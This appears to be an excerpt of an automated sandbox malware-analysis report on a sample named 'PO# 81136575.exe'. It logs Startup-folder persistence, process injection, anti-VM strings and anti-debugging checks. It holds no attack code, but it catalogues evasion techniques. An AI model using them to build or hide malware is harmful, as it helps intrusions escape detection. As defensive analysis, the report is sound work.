                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\clip.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\sages.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: PO# 81136575.exe PID: 9020, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: sage.exe PID: 4568, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: sage.exe PID: 904, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFAC542D144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFAC5430594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFAC542FF74
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFAC542D6C4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFAC542D864
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI/Special instruction interceptor: Address: 7FFAC542D004
                Uses ping.exe to sleep
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 49Jump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeMemory allocated: 30E0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeMemory allocated: 32D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeMemory allocated: 52D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 2A00000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 2C50000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 2A90000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 7560000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 8560000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 8700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 9700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 9A30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: AA30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: BA30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 1290000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 2CB0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 7690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 8690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 8830000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 9830000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: 9B60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: AB60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeMemory allocated: BB60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 1A30000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 33B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 53B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 2660000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 28E0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 2700000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: CB0000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 2700000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 2470000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 3080000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 3260000 memory reserve | memory write watch
                Source: C:\Users\user\AppData\Local\Temp\sages.exeMemory allocated: 30C0000 memory reserve | memory write watch
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0155088E rdtsc 18_2_0155088E
                Source: C:\Users\user\Desktop\PO# 81136575.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\PO# 81136575.exeWindow / User API: threadDelayed 783Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeWindow / User API: threadDelayed 4769Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeWindow / User API: threadDelayed 442Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeWindow / User API: threadDelayed 4711Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeWindow / User API: threadDelayed 4755Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeWindow / User API: threadDelayed 494Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeWindow / User API: threadDelayed 4666Jump to behavior
                Source: C:\Windows\SysWOW64\clip.exeWindow / User API: threadDelayed 9715
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 0.9 %
                Source: C:\Windows\SysWOW64\clip.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\PO# 81136575.exe TID: 8416Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exe TID: 8416Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 2296Thread sleep count: 47 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 2296Thread sleep time: -47000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 2960Thread sleep count: 47 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\PING.EXE TID: 2960Thread sleep time: -47000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 4620Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 4620Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 6784Thread sleep time: -442000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 6784Thread sleep time: -4711000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 4640Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 4640Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 7192Thread sleep count: 4755 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 5284Thread sleep count: 494 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 5284Thread sleep time: -494000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 4640Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 5284Thread sleep count: 4666 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe TID: 5284Thread sleep time: -4666000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exe TID: 3604Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\clip.exe TID: 6072Thread sleep count: 121 > 30
                Source: C:\Windows\SysWOW64\clip.exe TID: 6072Thread sleep time: -242000s >= -30000s
                Source: C:\Windows\SysWOW64\clip.exe TID: 6072Thread sleep count: 9715 > 30
                Source: C:\Windows\SysWOW64\clip.exe TID: 6072Thread sleep time: -19430000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\sages.exe TID: 4648Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\clip.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\clip.exeCode function: 24_2_02E1C010 FindFirstFileW,FindNextFileW,FindClose,24_2_02E1C010
                Source: C:\Users\user\Desktop\PO# 81136575.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\sages.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start MenuJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Desktop\PO# 81136575.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: firefox.exe, 0000001C.00000002.3022448614.000001A62FB78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllee@
                Source: PO# 81136575.exe, sage.exe.4.drBinary or memory string: #Microsoft-Hyper-V
                Source: PO# 81136575.exe, sage.exe.4.drBinary or memory string: OMicrosoft-Hyper-V-Management-PowerShell
                Source: PO# 81136575.exe, 00000000.00000002.1253880543.00000000044B5000.00000004.00000800.00020000.00000000.sdmp, PO# 81136575.exe, 00000000.00000002.1251917102.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, PO# 81136575.exe, 00000000.00000002.1253880543.00000000042D1000.00000004.00000800.00020000.00000000.sdmp, PO# 81136575.exe, 00000000.00000002.1256723069.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp, sage.exe, 0000000E.00000002.5966810448.0000000002C51000.00000004.00000800.00020000.00000000.sdmp, sage.exe, 00000011.00000002.5979216794.0000000002CBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                Source: PO# 81136575.exe, sage.exe.4.drBinary or memory string: SMB2Protocol+Microsoft-Hyper-V-All
                Source: PO# 81136575.exe, sage.exe.4.drBinary or memory string: 7Microsoft-Hyper-V-Tools-All
                Source: sage.exe, 00000011.00000002.5979216794.0000000002CBB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q#SOFTWARE\VMware, Inc.\VMware VGAuth
                Source: sage.exe, 0000000E.00000002.6014032031.0000000006B06000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll""LF
                Source: clip.exe, 00000018.00000002.5955950229.0000000003096000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-%
                Source: PO# 81136575.exe, sage.exe.4.drBinary or memory string: IMicrosoft-Hyper-V-Management-Clients
                Source: PO# 81136575.exe, 00000000.00000002.1256723069.0000000005AC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: 2051979379GSOFTWARE\VMware, Inc.\VMware VGAuth
                Source: C:\Users\user\Desktop\PO# 81136575.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Local\Temp\sages.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeSystem information queried: KernelDebuggerInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\clip.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
